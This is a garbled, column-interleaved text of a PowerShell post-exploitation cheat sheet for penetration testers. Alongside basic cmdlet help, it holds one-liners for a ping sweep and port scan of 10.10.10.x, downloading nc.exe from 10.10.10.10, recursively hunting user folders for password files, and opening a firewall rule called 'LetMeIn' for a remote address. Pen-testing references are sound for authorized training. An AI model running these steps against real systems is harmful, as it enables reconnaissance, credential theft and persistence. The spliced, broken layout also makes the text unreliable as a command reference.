Useful Cmdlets (and aliases) PowerShell for Pen-Tester Post-Exploitation PowerShell

Get a directory listing (ls, dir, gci): PS C:\> Get-ChildItem

Conduct a ping sweep: Cheat Sheet
PS C:\> 1..255 | % {echo "10.10.10.$_";
ping -n 1 -w 100 10.10.10.$_ | Select- String ttl}
v. 4.0
Copy a file (cp, copy, cpi): POCKET REFERENCE GUIDE
PS C:\> Copy-Item src.txt dst.txt
Conduct a port scan:
PS C:\> 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10
Move a file (mv, move, mi):
.10",$_)) "Port $_ is open!"} 2>$null
PS C:\> Move-Item src.txt dst.txt

Fetch a file via HTTP (wget in PowerShell):

Find text within a file:
PS C:\> Select-String –path c:\users
\*.txt –pattern password
PS C:\> ls -r c:\users -file | %
{Select-String -path $_ -pattern password} Find all files with a particular name:
Display file contents (cat, type, gc): PS C:\> Get-Content file.txt
Get present directory (pwd, gl):
PS C:\> Get-Location
Get a process listing (ps, gps):
PS C:\> Get-Process
Get a service listing:
PS C:\> Get-Service
PS C:\> (New-Object System.Net.WebClient).DownloadFile("http
://10.10.10.10/nc.exe","nc.exe") Purpo
The purpose of this cheat
sheet is to describe some
PS C:\> Get-ChildItem "C:\Users\" - recurse-include *passwords*.txt
common options and
techniques for use in
Get a listing of all installed Microsoft Hotfixes: Microsoft’s PowerShell.
PS C:\> Get-HotFix
Navigate the Windows registry: PowerShell Overview
PS C:\> cd HKLM:\
PS HKLM:\> ls PowerShell Background
List programs set to start automatically in the registry: PowerShell is the successor to command.com, cmd.exe an
PS C:\> Get-ItemProperty HKLM:\SOFTWARE
\Microsoft\Windows\CurrentVersion\run Launching PowerShell

Formatting output of a command (Format-List): PS C:\> ls

Paginating output:
PS C:\> ls –r | Out-Host -paging
Get the SHA1 hash of a file:
PS C:\> Get-FileHash -Algorithm SHA1 file.txt
Exporting output to CSV:
PS C:\> Get-Process | Export-Csv procs.csv
Convert | Format-List
string –property name
from ascii to Base64: PowerShell is accessed by pressing Start -> typing powers
PS C:\> Some operations require administrative privileges
[System.Convert]::ToBase64String([System and can be accomplished by launching PowerShell as an e
.Text.Encoding]::UTF8.GetBytes("PS FTW!")) > typing powershell and pressing Shift-CTRL- Enter.
Additionally, PowerShell cmdlets can be called from cmd.e
List and modify the Windows firewall rules:
PS C:\> Get-NetFirewallRule –all
PS C:\> New-NetFirewallRule -Action Allow -DisplayName LetMeIn - RemoteAddress 10.10.10.25
 5 PowerShell Essentials
Syntax Getting
Concept What’s it A Handy Alias
Cmdlets are small scripts that follow a To get help with help:
Do?
dash- separated verb-noun convention PS C:\> Get-Help
such as "Get- Process". PS C:\> Get-Help Shows help PS C:\> help
To read cmdlet self documentation: [cmdlet] - & examples [cmdlet] -
examples examples
Similar Verbs with Different Actions: PS C:\> Get-Help <cmdlet>
- New- Creates a new resource
- Set- Modifies an existing resource PS C:\> Get- Shows a list PS C:\> gcm
Detailed help: Command of *[string]*
- Get- Retrieves an existing resource PS C:\> Get-Help <cmdlet> -detailed commands
- Read- Gets information from a PS C:\> Get- Shows PS C:\> [cmdlet]
source, such as a file Usage examples: Member properties & | gm
- Find- Used to look for an object PS C:\> Get-Help <cmdlet> -examples methods
- Search- Used to create a PS C:\> ForEach- Takes each PS C:\> [cmdlet]
reference to a resource Full (everything) help: Object { $_ } item on | % { [cmdlet]
- Start- (asynchronous) begin an pipeline and $_ }
PS C:\> Get-Help <cmdlet> -full handles it as
operation, such as starting a process $_
- Invoke- (synchronous) perform an Online help (if available): PS C:\> Select- Searches for PS C:\> sls –path
operation such as running a command PS C:\> Get-Help <cmdlet> -online String strings in files [file] –pattern
or output, like [string]
grep
Parameters:
Each verb-noun named cmdlet may
have many parameters to control Pipelining, Loops, and Variables
cmdlet functionality. Piping cmdlet output to another cmdlet:
Cmdlet PS C:\> Get-Process | Format-List
Objects: –property name
The output of most cmdlets are objects Aliases provide short references
that can be passed to other cmdlets to long commands.
ForEach-Object in the pipeline (alias %):
and further acted upon. This becomes PS C:\> ls *.txt | ForEach-Object
important in pipelining cmdlets. To list available aliases (alias
{cat $_}
alias): PS C:\> Get-Alias
Where-Object condition (alias where
To expand an alias into a full name:
or ?): PS C:\> Get-Process |
PS C:\> alias <unknown alias>
Where-Object
Finding Cmdlets PS C:\> alias gcm
{$_.name –eq "notepad"}
To get a list of all available cmdlets:
PS C:\> Get-Command Generating ranges of numbers and looping:
Efficient PowerShell PS C:\> 1..10
Tabverb
completion: PS C:\> 1..10 | % {echo "Hello!"}
Get-Command supports filtering. To filter cmdlets on the set:
PS C:\> Get-Command Set*or PS C:\> get-
child<TAB> PS C:\> Creating and listing variables:
PS C:\> Get-Command –Verb Set
Get-ChildItem PS C:\> $tmol = 42
PS C:\> ls variable:
Or on the noun process: Parameter shortening:
PS C:\> Get-Command *Process or PS C:\> ls –recurse is equivalent to: Examples of passing cmdlet output down
PS C:\> Get-Command –Noun process PS C:\> ls -r pipeline: PS C:\> dir | group
extension | sort PS C:\> Get-
Service dhcp | Stop- Service -